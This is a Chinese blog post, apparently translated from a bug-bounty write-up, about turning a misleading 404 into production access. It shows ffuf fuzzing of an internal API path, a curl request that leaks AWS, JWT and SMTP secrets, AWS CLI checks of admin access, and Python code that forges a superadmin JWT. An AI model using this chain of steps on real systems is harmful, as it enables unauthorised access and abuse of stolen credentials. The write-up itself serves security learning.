

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/fluid.png">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="cury">
  <meta name="keywords" content="">
  
    <meta name="description" content="从404到获取权限：通过api路由获得生产密钥人生教训 #210：仅仅因为某个东西返回 404 并不意味着它已经死了——有时它只是需要正确的耳语……或精心设计的 cURL。🤯 我不知道一个简单的 404 会成为我进入生产库的金票。 🧠 设置：当 Recon 成为现实时在 SaaS 平台上进行一些大规模侦察时，我偶然发现了一个未经身份验证的子域： 1https:&#x2F;&#x2F;api-dev.targetc">
<meta property="og:type" content="article">
<meta property="og:title" content="404如何继续渗透">
<meta property="og:url" content="https://cury-w.github.io/2025/06/30/404%E5%A6%82%E4%BD%95%E7%BB%A7%E7%BB%AD%E6%B8%97%E9%80%8F/index.html">
<meta property="og:site_name" content="坤坤后花园">
<meta property="og:description" content="从404到获取权限：通过api路由获得生产密钥人生教训 #210：仅仅因为某个东西返回 404 并不意味着它已经死了——有时它只是需要正确的耳语……或精心设计的 cURL。🤯 我不知道一个简单的 404 会成为我进入生产库的金票。 🧠 设置：当 Recon 成为现实时在 SaaS 平台上进行一些大规模侦察时，我偶然发现了一个未经身份验证的子域： 1https:&#x2F;&#x2F;api-dev.targetc">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2025-06-30T07:05:49.000Z">
<meta property="article:modified_time" content="2025-06-30T07:12:05.521Z">
<meta property="article:author" content="cury">
<meta property="article:tag" content="404">
<meta name="twitter:card" content="summary_large_image">
  
  
  
  <title>404如何继续渗透 - 坤坤后花园</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"cury-w.github.io","root":"/","version":"1.9.8","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2024-01-01T00:00:00.000Z","token":null,"api_server":null}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 6.3.0"></head>


<body>
  
    

<style type="text/css">
    @keyframes spin3D {
        from {
            transform: rotate3d(0.5, 0.5, 0.5, 360deg);
        }

        to {
            transform: rotate3d(0deg);
        }
    }

    #loading {
        height: 100%;
        background-color: #172d4781;
        backdrop-filter: saturate(100%) blur(10px);
        display: flex;
        justify-content: center;
        align-items: center;
        position: fixed;
        top: 0;
        left: 0;
        right: 0;
        overflow: hidden;
        z-index: 99999999;
    }

    .spinner-box {
        width: 300px;
        height: 300px;
        display: flex;
        justify-content: center;
        align-items: center;
        background-color: transparent;
    }

    .leo {
        position: absolute;
        display: flex;
        justify-content: center;
        align-items: center;
        border-radius: 50%;
    }

    .blue-orbit {
        width: 175px;
        height: 175px;
        border: 2px solid #1a91fa;
        animation: spin3D 3s linear .2s infinite;
    }

    .green-orbit {
        width: 135px;
        height: 135px;
        border: 2px solid #00ffdd;
        animation: spin3D 2s linear 0s infinite;
    }

    .red-orbit {
        width: 100px;
        height: 100px;
        border: 2px solid #d75151;
        animation: spin3D 1s linear 0s infinite;
    }

    .white-orbit-a {
        width: 70px;
        height: 70px;
        border: 1px solid #faf5f5;
        animation: spin3D 3s linear 0s infinite;
    }

    .white-orbit-b {
        width: 70px;
        height: 70px;
        border: 1px solid #faf5f5;
        animation: spin3D 1.5s linear 0s infinite;
    }

    .nucleus {
        width: 1px;
        height: 1px;
        border: 1px solid #ffffff;
        animation: spin3D 1s linear 0s infinite;
    }
</style>

<div id="loading">
    <div class="spinner-box">
        <div class="blue-orbit leo"></div>
        <div class="green-orbit leo"></div>
        <div class="red-orbit leo"></div>
        <div class="white-orbit-a leo"></div>
        <div class="white-orbit-b leo"></div>
        <div class="nucleus leo"></div>
    </div>
</div>

<script>
    (function () {
        const loaded = function () {
            window.onload = function () {
                const loader = document.getElementById("loading");
                loader.className = "fadeout";
                setTimeout(function () {
                    loader.style.display = "none";
                }, 
                500
                );
            }
        };
        loaded();
    })();
</script>
  
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong class="navbar-title">坤坤后花园</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="404如何继续渗透"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2025-06-30 15:05" pubdate>
          2025年6月30日 下午
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          689 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          6 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">404如何继续渗透</h1>
            
            
              <div class="markdown-body">
                
                <h1 id="从404到获取权限：通过api路由获得生产密钥"><a href="#从404到获取权限：通过api路由获得生产密钥" class="headerlink" title="从404到获取权限：通过api路由获得生产密钥"></a>从404到获取权限：通过api路由获得生产密钥</h1><p><strong>人生教训 #210：</strong>仅仅因为某个东西返回 404 并不意味着它已经<em>死了</em>——有时它只是需要正确的耳语……或精心设计的 cURL。🤯</p>
<p>我不知道一个简单的 404 会成为我进入生产库的金票。</p>
<h1 id="🧠-设置：当-Recon-成为现实时"><a href="#🧠-设置：当-Recon-成为现实时" class="headerlink" title="🧠 设置：当 Recon 成为现实时"></a>🧠 设置：当 Recon 成为现实时</h1><p>在 SaaS 平台上进行一些大规模侦察时，我偶然发现了一个未经身份验证的子域：</p>
<figure class="highlight dts"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs dts"><span class="hljs-symbol">https:</span><span class="hljs-comment">//api-dev.targetcompany.com</span><br></code></pre></td></tr></table></figure>

<p>看起来很无聊。我用一些通用路径来探测它：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs bash">/api/v1/users<br>/api/v1/admin<br>/api/v1/config<br></code></pre></td></tr></table></figure>

<p>一切都回到了 404。或者我是这么想的。</p>
<p>但是我的爬虫脚本标记了一件奇怪的事情：</p>
<figure class="highlight pgsql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs pgsql"><span class="hljs-keyword">GET</span> /api/v1/<span class="hljs-type">internal</span>/statusResponse: <span class="hljs-number">404</span> <span class="hljs-keyword">Not</span> <span class="hljs-built_in">Found</span> (but <span class="hljs-keyword">with</span> a <span class="hljs-number">500</span>ms delay)<br></code></pre></td></tr></table></figure>

<h1 id="🔍-深入探讨：冰壶幻影"><a href="#🔍-深入探讨：冰壶幻影" class="headerlink" title="🔍 深入探讨：冰壶幻影"></a>🔍 深入探讨：冰壶幻影</h1><p>我手动点击它：</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">curl -i https:<span class="hljs-regexp">//</span>api-dev.targetcompany.com<span class="hljs-regexp">/api/</span>v1<span class="hljs-regexp">/internal/</span>status<br></code></pre></td></tr></table></figure>

<p>仍然是 404。但标头暴露了它：</p>
<figure class="highlight less"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs less"><span class="hljs-attribute">x-powered-by</span>: <span class="hljs-attribute">expressx-env</span>: production<br></code></pre></td></tr></table></figure>

<p>这不是一个开发服务器。这是<em>从 dev 子域</em>公开 prod 配置。</p>
<h1 id="🕴️-发现阶段：Fuzz-Till-You-Drop"><a href="#🕴️-发现阶段：Fuzz-Till-You-Drop" class="headerlink" title="🕴️ 发现阶段：Fuzz Till You Drop"></a>🕴️ 发现阶段：Fuzz Till You Drop</h1><p>是时候做手术了。</p>
<p>我沿着小路跑：<code>ffuf  /api/v1/internal/</code></p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">ffuf</span> -u https://api-dev.targetcompany.com/api/v1/internal/FUZZ -w wordlist.txt -mc <span class="hljs-number">200</span>,<span class="hljs-number">403</span>,<span class="hljs-number">500</span> -ac<br></code></pre></td></tr></table></figure>



<ul>
<li><code>/api/v1/internal/env</code></li>
<li><code>/api/v1/internal/secrets</code></li>
<li><code>/api/v1/internal/creds</code></li>
</ul>
<p>直到我发送了一个请求：<code>/secrets</code></p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">curl https:<span class="hljs-regexp">//</span>api-dev.targetcompany.com<span class="hljs-regexp">/api/</span>v1<span class="hljs-regexp">/internal/</span>secrets<br></code></pre></td></tr></table></figure>

<p>响应：</p>
<figure class="highlight perl"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs perl">&#123;  <span class="hljs-string">&quot;aws_key&quot;</span>: <span class="hljs-string">&quot;AKIAIOSFODNN7EXAMPLE&quot;</span>,  <span class="hljs-string">&quot;aws_secret&quot;</span>: <span class="hljs-string">&quot;wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY&quot;</span>,  <span class="hljs-string">&quot;jwt_secret&quot;</span>: <span class="hljs-string">&quot;thisisnotsosecret123&quot;</span>,  <span class="hljs-string">&quot;smtp_user&quot;</span>: <span class="hljs-string">&quot;alerts<span class="hljs-variable">@targetcompany</span>.com&quot;</span>,  <span class="hljs-string">&quot;smtp_pass&quot;</span>: <span class="hljs-string">&quot;SuperSecret123!&quot;</span>&#125;<br></code></pre></td></tr></table></figure>



<p>这是完全的 prod 凭证泄漏 — 来自<em>一个本应删除</em>但在 404 掩码后面保持开放状态的端点。</p>
<h1 id="🚀-武器化：从-Leak-到-Pwn"><a href="#🚀-武器化：从-Leak-到-Pwn" class="headerlink" title="🚀 武器化：从 Leak 到 Pwn"></a>🚀 武器化：从 Leak 到 Pwn</h1><p>借助 AWS 信誉，我验证了访问权限：</p>
<figure class="highlight ebnf"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs ebnf"><span class="hljs-attribute">aws configure</span><br></code></pre></td></tr></table></figure>

<p>有效。</p>
<figure class="highlight ebnf"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs ebnf"><span class="hljs-attribute">aws iam list-users</span><br></code></pre></td></tr></table></figure>

<p>完全管理员访问权限。我可以：</p>
<ul>
<li>列出 S3 存储桶</li>
<li>旋转 EC2 实例</li>
<li>查看日志</li>
<li>从他们的域发送 SMTP 电子邮件</li>
</ul>
<p>使用 ，我伪造了管理员令牌：<code>jwt_secret</code></p>
<figure class="highlight stata"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs stata">import jwtpayload = &#123;<span class="hljs-string">&quot;user&quot;</span>: <span class="hljs-string">&quot;admin&quot;</span>, <span class="hljs-string">&quot;role&quot;</span>: <span class="hljs-string">&quot;superadmin&quot;</span>&#125;<span class="hljs-keyword">token</span> = jwt.<span class="hljs-keyword">encode</span>(payload, <span class="hljs-string">&quot;thisisnotsosecret123&quot;</span>, algorithm=<span class="hljs-string">&quot;HS256&quot;</span>)<span class="hljs-keyword">print</span>(<span class="hljs-keyword">token</span>)<br></code></pre></td></tr></table></figure>

<p>用于：</p>
<figure class="highlight nix"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs nix">GET <span class="hljs-symbol">/dashboard</span> HTTP<span class="hljs-operator">/</span><span class="hljs-number">1.1</span><span class="hljs-params">Authorization:</span> Bearer <span class="hljs-symbol">&lt;forged_token&gt;</span><br></code></pre></td></tr></table></figure>

<p>🚫 没有 2FA。无需额外验证。完全访问权限。</p>
<p>我现在是他们内部门户的管理员。🧹</p>
<p><a target="_blank" rel="noopener" href="https://vip.bdziyi.com/how-i-turned-a-403-forbidden-into-a-goldmine-738cdf1407aa?source=post_page-----cc8ec9c6d063---------------------------------------">我如何将 403 Forbidden 变成金矿 🚀免费链接🎈infosecwriteups.com</a></p>
<h1 id="📊-根本原因：幽灵端点"><a href="#📊-根本原因：幽灵端点" class="headerlink" title="📊 根本原因：幽灵端点"></a>📊 根本原因：幽灵端点</h1><p>事实证明，这些路由本应在暂存期间删除，但仅在前端被<em>注释掉</em>。<code>/api/v1/internal/*</code></p>
<p>当路由逻辑失败但端点本身存在时，后端仍然用误导性的 404 暴露它们。</p>
<p>开发逻辑：</p>
<figure class="highlight kotlin"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs kotlin"><span class="hljs-keyword">if</span> (!user) <span class="hljs-keyword">return</span> <span class="hljs-number">404</span>; <span class="hljs-comment">// instead of 403</span><br></code></pre></td></tr></table></figure>

<h1 id="🖊️-最终-PoC-摘要："><a href="#🖊️-最终-PoC-摘要：" class="headerlink" title="🖊️ 最终 PoC 摘要："></a>🖊️ 最终 PoC 摘要：</h1><p><strong>目标：</strong> <code>https://api-dev.targetcompany.com/api/v1/internal/secrets</code></p>
<p><strong>使用的技术：</strong>路由泄露 + 误导性 404 + 未经身份验证的访问 + 凭据泄露</p>
<ul>
<li>AWS 完全访问权限</li>
<li>SMTP 欺骗</li>
<li>JWT 身份验证绕过</li>
<li>敏感信息泄露</li>
</ul>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/404/" class="print-no-link">#404</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>404如何继续渗透</div>
      <div>https://cury-w.github.io/2025/06/30/404如何继续渗透/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>cury</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2025年6月30日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-cc-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2025/07/01/%E5%BA%94%E6%80%A5%E6%BA%AF%E6%BA%90%E5%91%BD%E4%BB%A4/" title="应急溯源命令">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">应急溯源命令</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2025/06/30/js%E7%9A%84%E5%8F%91%E7%8E%B0%E5%92%8C%E5%88%A9%E7%94%A8/" title="js的发现和利用">
                        <span class="hidden-mobile">js的发现和利用</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  <div>
  <span id="timeDate">正在载入天数...</span>
  <span id="times">载入时分秒...</span>
  <script>
  var now = new Date();
  function createtime(){
      var grt= new Date("06/23/2025 19:47:00");
      now.setTime(now.getTime()+250);
      days = (now - grt ) / 1000 / 60 / 60 / 24;
      dnum = Math.floor(days);
      hours = (now - grt ) / 1000 / 60 / 60 - (24 * dnum);
      hnum = Math.floor(hours);
      if(String(hnum).length ==1 ){
          hnum = "0" + hnum;
      }
      minutes = (now - grt ) / 1000 /60 - (24 * 60 * dnum) - (60 * hnum);
      mnum = Math.floor(minutes);
      if(String(mnum).length ==1 ){
                mnum = "0" + mnum;
      }
      seconds = (now - grt ) / 1000 - (24 * 60 * 60 * dnum) - (60 * 60 * hnum) - (60 * mnum);
      snum = Math.round(seconds);
      if(String(snum).length ==1 ){
                snum = "0" + snum;
      }
      document.getElementById("timeDate").innerHTML = "🚀已持续航行&nbsp"+dnum+"&nbsp天";  
      document.getElementById("times").innerHTML = hnum + "&nbsp时&nbsp" + mnum + "&nbsp分&nbsp" + snum + "&nbsp秒";
  }
  setInterval("createtime()",250);
  </script>
</div>
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

<!-- 引入jQuery -->
<script type="text/javascript" src="//libs.baidu.com/jquery/1.8.3/jquery.min.js"></script>
<!-- 雪花特效2 -->
 <script type="text/javascript" src="/js/snow2.js"></script>

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
